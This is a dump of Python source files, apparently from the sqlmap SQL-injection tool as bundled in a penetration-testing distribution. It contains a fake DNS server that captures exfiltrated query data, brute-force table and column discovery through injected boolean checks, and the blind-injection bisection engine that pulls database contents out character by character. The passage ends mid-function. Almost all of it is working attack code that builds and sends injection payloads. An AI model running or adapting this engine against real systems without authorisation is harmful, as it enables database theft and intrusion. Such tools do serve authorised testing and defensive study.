pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/dns.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import os
import re
import socket
import threading
import time

class DNSQuery(object):
    """
    Used for making fake DNS resolution responses based on a received raw request

    Reference(s):
        http://code.activestate.com/recipes/491264-mini-fake-dns-server/
        https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
    """

    def __init__(self, raw):
        self._raw = raw
        self._query = ""

        type_ = (ord(raw[2]) >> 3) & 15                 # Opcode bits

        if type_ == 0:                                  # Standard query
            i = 12
            j = ord(raw[i])

            while j != 0:
                self._query += raw[i + 1:i + j + 1] + '.'
                i = i + j + 1
                j = ord(raw[i])

    def response(self, resolution):
        """
        Crafts a raw DNS resolution response packet
        """

        retVal = ""

        if self._query:
            retVal += self._raw[:2]                                         # Transaction ID
            retVal += "\x85\x80"                                            # Flags (Standard query response, No error)
            retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00"  # Questions and Answers Counts
            retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)]  # Original Domain Name Query
            retVal += "\xc0\x0c"                                            # Pointer to domain name
            retVal += "\x00\x01"                                            # Type A
            retVal += "\x00\x01"                                            # Class IN
            retVal += "\x00\x00\x00\x20"                                    # TTL (32 seconds)
            retVal += "\x00\x04"                                            # Data length
            retVal += "".join(chr(int(_)) for _ in resolution.split('.'))   # 4 bytes of IP

        return retVal

class DNSServer(object):
    def __init__(self):
        self._requests = []
        self._lock = threading.Lock()
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._socket.bind(("", 53))
        self._running = False
        self._initialized = False

    def pop(self, prefix=None, suffix=None):
        """
        Returns a received DNS resolution request (if any) that has the given
        prefix/suffix combination (e.g. prefix.<query result>.suffix.domain)
        """

        retVal = None

        with self._lock:
            for _ in self._requests:
                if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):
                    retVal = _
                    self._requests.remove(_)
                    break

        return retVal

    def run(self):
        """
        Runs a DNSServer instance as a daemon thread (killed by program exit)
        """

        def _():
            try:
                self._running = True
                self._initialized = True

                while True:
                    data, addr = self._socket.recvfrom(1024)
                    _ = DNSQuery(data)
                    self._socket.sendto(_.response("127.0.0.1"), addr)

                    with self._lock:
                        self._requests.append(_._query)
            except KeyboardInterrupt:
                raise
            finally:
                self._running = False

        thread = threading.Thread(target=_)
        thread.daemon = True
        thread.start()

if __name__ == "__main__":
    server = None

    try:
        server = DNSServer()
        server.run()

        while not server._initialized:
            time.sleep(0.1)

        while server._running:
            while True:
                _ = server.pop()

                if _ is None:
                    break
                else:
                    print "[i] %s" % _

            time.sleep(1)

    except socket.error, ex:
        if 'Permission' in str(ex):
            print "[x] Please run with sudo/Administrator privileges"
        else:
            raise
    except KeyboardInterrupt:
        os._exit(0)
    finally:
        if server:
            server._running = False
4,468
Python
.py
114
28.631579
123
0.477336
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
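The DNSQuery parser above walks the question section's length-prefixed labels starting at byte 12, the end of the fixed DNS header. A standalone round-trip of that encoding, written for Python 3 bytes (the 12 zero bytes stand in for a real header):

def encode_qname(domain):
    """'a.b.c' -> DNS length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in domain.split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_qname(raw, offset=12):
    """Inverse walk, mirroring DNSQuery.__init__ above."""
    name, i = "", offset
    while raw[i] != 0:
        n = raw[i]
        name += raw[i + 1:i + 1 + n].decode("ascii") + "."
        i += n + 1
    return name

packet = b"\x00" * 12 + encode_qname("37.attacker.example")   # fake header + question
print(decode_qname(packet))                                    # -> 37.attacker.example.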
18,960
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/__init__.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,961
use.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/brute/use.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import time from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import filterListValue from lib.core.common import getFileItems from lib.core.common import Backend from lib.core.common import getPageWordSet from lib.core.common import hashDBWrite from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeStringFormat from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS from lib.core.enums import HASHDB_KEYS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.settings import METADB_SUFFIX from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.request import inject def _addPageTextWords(): wordsList = [] infoMsg = "adding words used on web page to the check list" logger.info(infoMsg) pageWords = getPageWordSet(kb.originalPage) for word in pageWords: word = word.lower() if len(word) > 2 and not word[0].isdigit() and word not in wordsList: wordsList.append(word) return wordsList def tableExists(tableFile, regex=None): if kb.tableExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common table existence check" logger.warn(warnMsg) message = "are you sure you want to continue? 
[y/N] " test = readInput(message, default="N") kb.tableExistsChoice = test[0] in ("y", "Y") if not kb.tableExistsChoice: return None result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise SqlmapDataException(errMsg) tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.value = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.value.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2) and not hasattr(conf, "api"): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. 
sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.value: warnMsg = "no table(s) found" logger.warn(warnMsg) else: for item in threadData.shared.value: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in ((conf.db, item) for item in threadData.shared.value): if _ not in kb.brute.tables: kb.brute.tables.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables def columnExists(columnFile, regex=None): if kb.columnExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common column existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " test = readInput(message, default="N") kb.columnExistsChoice = test[0] in ("y", "Y") if not kb.columnExistsChoice: return None if not conf.tbl: errMsg = "missing table parameter" raise SqlmapMissingMandatoryOptionException(errMsg) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise SqlmapDataException(errMsg) infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(_addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.value = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.value.append(column) if conf.verbose in (1, 2) and not hasattr(conf, "api"): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. 
sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.value: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.value: if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) else: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = "numeric" else: columns[column] = "non-numeric" kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): if _ not in kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
10,756
Python
.py
207
43.130435
167
0.672072
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
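Stripped of threading and console bookkeeping, tableExists() above reduces to: feed candidate names into a boolean oracle built from the EXISTS(...) template and keep case-insensitive uniques. A sketch with a stubbed oracle in place of inject.checkBooleanExpression() (fake_schema is invented):

def brute_tables(candidates, oracle):
    """Return candidate table names the boolean oracle confirms, deduplicated."""
    found, seen = [], set()
    for name in candidates:
        if name.lower() in seen:
            continue
        if oracle("EXISTS(SELECT 1 FROM %s)" % name):   # same template shape as above
            found.append(name)
            seen.add(name.lower())
    return found

fake_schema = ("users", "orders")                       # stands in for the real database
oracle = lambda expr: any("FROM %s)" % t in expr for t in fake_schema)
print(brute_tables(["users", "USERS", "logs", "orders"], oracle))   # -> ['users', 'orders']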
18,962
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/brute/__init__.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,963
inference.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/blind/inference.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import threading import time from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout from lib.core.common import decodeHexValue from lib.core.common import decodeIntToUnicode from lib.core.common import filterControlChars from lib.core.common import getCharset from lib.core.common import getCounter from lib.core.common import goGoodSamaritan from lib.core.common import getPartRun from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter from lib.core.common import safeStringFormat from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import ADJUST_TIME_DELAY from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapThreadException from lib.core.settings import CHAR_INFERENCE_MARK from lib.core.settings import INFERENCE_BLANK_BREAK from lib.core.settings import INFERENCE_UNKNOWN_CHAR from lib.core.settings import INFERENCE_GREATER_CHAR from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR from lib.core.settings import MAX_BISECTION_LENGTH from lib.core.settings import MAX_TIME_REVALIDATION_STEPS from lib.core.settings import PARTIAL_HEX_VALUE_MARKER from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request from lib.utils.progress import ProgressBar from lib.utils.xrange import xrange def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Bisection algorithm that can be used to perform blind SQL injection on an affected host """ abortedFlag = False partialValue = u"" finalValue = None retrievedLength = 0 asciiTbl = getCharset(charsetType) timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) retVal = hashDBRetrieve(expression, checkConf=True) if retVal: if PARTIAL_HEX_VALUE_MARKER in retVal: retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "") if retVal and conf.hexConvert: partialValue = retVal infoMsg = "resuming partial value: %s" % safecharencode(partialValue) logger.info(infoMsg) elif PARTIAL_VALUE_MARKER in retVal: retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") if retVal and not conf.hexConvert: partialValue = retVal infoMsg = "resuming partial value: %s" % safecharencode(partialValue) logger.info(infoMsg) else: infoMsg = "resumed: %s" % safecharencode(retVal) logger.info(infoMsg) return 0, retVal try: # Set kb.partRun in case "common prediction" feature (a.k.a. 
"good # samaritan") is used or the engine is called from the API if conf.predictOutput: kb.partRun = getPartRun() elif hasattr(conf, "api"): kb.partRun = getPartRun(alias=False) else: kb.partRun = None if partialValue: firstChar = len(partialValue) elif "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): firstChar = 0 elif dump and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())): firstChar = int(conf.firstChar) - 1 elif isinstance(firstChar, basestring) and firstChar.isdigit() or isinstance(firstChar, int): firstChar = int(firstChar) - 1 else: firstChar = 0 if "LENGTH(" in expression.upper() or "LEN(" in expression.upper(): lastChar = 0 elif dump and conf.lastChar is not None and (isinstance(conf.lastChar, int) or (isinstance(conf.lastChar, basestring) and conf.lastChar.isdigit())): lastChar = int(conf.lastChar) elif isinstance(lastChar, basestring) and lastChar.isdigit() or isinstance(lastChar, int): lastChar = int(lastChar) else: lastChar = 0 if Backend.getDbms(): _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) expressionUnescaped = unescaper.escape(expressionReplaced) else: expressionUnescaped = unescaper.escape(expression) if isinstance(length, basestring) and length.isdigit() or isinstance(length, int): length = int(length) else: length = None if length == 0: return 0, "" if length and (lastChar > 0 or firstChar > 0): length = min(length, lastChar or length) - firstChar if length and length > MAX_BISECTION_LENGTH: length = None showEta = conf.eta and isinstance(length, int) numThreads = min(conf.threads, length) if showEta: progress = ProgressBar(maxValue=length) if timeBasedCompare and conf.threads > 1: warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" singleTimeWarnMessage(warnMsg) if numThreads > 1: if not timeBasedCompare: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) else: numThreads = 1 if conf.threads == 1 and not timeBasedCompare and not conf.predictOutput: warnMsg = "running in a single-thread mode. 
Please consider " warnMsg += "usage of option '--threads' for faster data retrieval" singleTimeWarnMessage(warnMsg) if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): if isinstance(length, int) and conf.threads > 1: dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) else: dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) hintlock = threading.Lock() def tryHint(idx): with hintlock: hintValue = kb.hintValue if hintValue is not None and len(hintValue) >= idx: if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2): posValue = hintValue[idx - 1] else: posValue = ord(hintValue[idx - 1]) forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return hintValue[idx - 1] with hintlock: kb.hintValue = None return None def validateChar(idx, value): """ Used in time-based inference (in case that original and retrieved value are not equal there will be a deliberate delay). """ if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value)) forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) return not result def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 """ result = tryHint(idx) if result: return result if charTbl is None: charTbl = type(asciiTbl)(asciiTbl) originalTbl = type(charTbl)(charTbl) if continuousOrder and shiftTable is None: # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: charTbl.remove(ord('\n')) if not charTbl: return None elif len(charTbl) == 1: forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(charTbl[0]) else: return None maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] while len(charTbl) != 1: position = (len(charTbl) >> 1) posValue = charTbl[position] if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) else: # e.g.: ... > '%c' -> ... > ORD(..) 
markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue)) forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: minValue = posValue if type(charTbl) != xrange: charTbl = charTbl[position:] else: # xrange() - extended virtual charset used for memory/space optimization charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: maxValue = posValue if type(charTbl) != xrange: charTbl = charTbl[:position] else: charTbl = xrange(charTbl[0], charTbl[position]) if len(charTbl) == 1: if continuousOrder: if maxValue == 1: return None # Going beyond the original charset elif minValue == maxChar: # If the original charTbl was [0,..,127] new one # will be [128,..,(128 << 4) - 1] or from 128 to 2047 # and instead of making a HUGE list with all the # elements we use a xrange, which is a virtual # list if expand and shiftTable: charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop()) originalTbl = xrange(charTbl) maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] else: return None else: retVal = minValue + 1 if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): if timeBasedCompare and not validateChar(idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec kb.timeValidCharsRun = 0 if (conf.timeSec - kb.originalTimeDelay) < MAX_TIME_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) conf.timeSec += 1 warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') logger.warn(warnMsg) if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: dbgMsg = "turning off time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO return getChar(idx, originalTbl, continuousOrder, expand, shiftTable) else: errMsg = "unable to properly validate last character value ('%s').." 
% decodeIntToUnicode(retVal) logger.error(errMsg) conf.timeSec = kb.originalTimeDelay return decodeIntToUnicode(retVal) else: if timeBasedCompare: kb.timeValidCharsRun += 1 if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES return decodeIntToUnicode(retVal) else: return None else: if minValue == maxChar or maxValue == minChar: return None for index in xrange(len(originalTbl)): if originalTbl[index] == minValue: break # If we are working with non-continuous elements, both minValue and character after # are possible candidates for retVal in (originalTbl[index], originalTbl[index + 1]): forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal)) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(retVal) return None # Go multi-threading (--threads > 1) if conf.threads > 1 and isinstance(length, int) and length > 1: threadData = getCurrentThreadData() threadData.shared.value = [None] * length threadData.shared.index = [firstChar] # As list for python nested function scoping threadData.shared.start = firstChar try: def blindThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.index.acquire() if threadData.shared.index[0] - firstChar >= length: kb.locks.index.release() return threadData.shared.index[0] += 1 curidx = threadData.shared.index[0] kb.locks.index.release() if kb.threadContinue: charStart = time.time() val = getChar(curidx) if val is None: val = INFERENCE_UNKNOWN_CHAR else: break with kb.locks.value: threadData.shared.value[curidx - 1 - firstChar] = val currentValue = list(threadData.shared.value) if kb.threadContinue: if showEta: progress.progress(time.time() - charStart, threadData.shared.index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 for i in xrange(length): if currentValue[i] is not None: endCharIndex = max(endCharIndex, i) output = '' if endCharIndex > conf.progressWidth: startCharIndex = endCharIndex - conf.progressWidth count = threadData.shared.start for i in xrange(startCharIndex, endCharIndex + 1): output += '_' if currentValue[i] is None else currentValue[i] for i in xrange(length): count += 1 if currentValue[i] is not None else 0 if startCharIndex > 0: output = '..' + output[2:] if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1): output = output[:-2] + '..' 
if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): _ = count - firstChar output += '_' * (min(length, conf.progressWidth) - len(output)) status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length)) output += status if _ != length else " " * len(status) dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output))) runThreads(numThreads, blindThread, startThreadMsg=False) except KeyboardInterrupt: abortedFlag = True finally: value = [_ for _ in partialValue] value.extend(_ for _ in threadData.shared.value) infoMsg = None # If we have got one single character not correctly fetched it # can mean that the connection to the target URL was lost if None in value: partialValue = "".join(value[:value.index(None)]) if partialValue: infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), filterControlChars(partialValue)) else: finalValue = "".join(value) infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue)) if conf.verbose in (1, 2) and not showEta and infoMsg and not hasattr(conf, "api"): dataToStdout(infoMsg) # No multi-threading (--threads = 1) else: index = firstChar while True: index += 1 charStart = time.time() # Common prediction feature (a.k.a. "good samaritan") # NOTE: to be used only when multi-threading is not set for # the moment if conf.predictOutput and len(partialValue) > 0 and kb.partRun is not None: val = None commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(partialValue, asciiTbl) # If there is one single output in common-outputs, check # it via equal against the query output if commonValue is not None: # One-shot query containing equals commonValue testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False) query = kb.injection.data[kb.technique].vector query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (expressionUnescaped, testValue))) query = agent.suffixQuery(query) result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) # Did we have luck? if result: if showEta: progress.progress(time.time() - charStart, len(commonValue)) elif conf.verbose in (1, 2) or hasattr(conf, "api"): dataToStdout(filterControlChars(commonValue[index - 1:])) finalValue = commonValue break # If there is a common pattern starting with partialValue, # check it via equal against the substring-query output if commonPattern is not None: # Substring-query containing equals commonPattern subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern)) testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False) query = kb.injection.data[kb.technique].vector query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (subquery, testValue))) query = agent.suffixQuery(query) result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) # Did we have luck? 
if result: val = commonPattern[index - 1:] index += len(val) - 1 # Otherwise if there is no commonValue (single match from # txt/common-outputs.txt) and no commonPattern # (common pattern) use the returned common charset only # to retrieve the query output if not val and commonCharset: val = getChar(index, commonCharset, False) # If we had no luck with commonValue and common charset, # use the returned other charset if not val: val = getChar(index, otherCharset, otherCharset == asciiTbl) else: val = getChar(index, asciiTbl) if val is None: finalValue = partialValue break if kb.data.processChar: val = kb.data.processChar(val) partialValue += val if showEta: progress.progress(time.time() - charStart, index) elif conf.verbose in (1, 2) or hasattr(conf, "api"): dataToStdout(filterControlChars(val)) # some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces if len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace() and partialValue.strip(' ')[-1:] != '\n': finalValue = partialValue[:-INFERENCE_BLANK_BREAK] break if (lastChar > 0 and index >= lastChar): finalValue = "" if length == 0 else partialValue finalValue = finalValue.rstrip() if len(finalValue) > 1 else finalValue partialValue = None break except KeyboardInterrupt: abortedFlag = True finally: 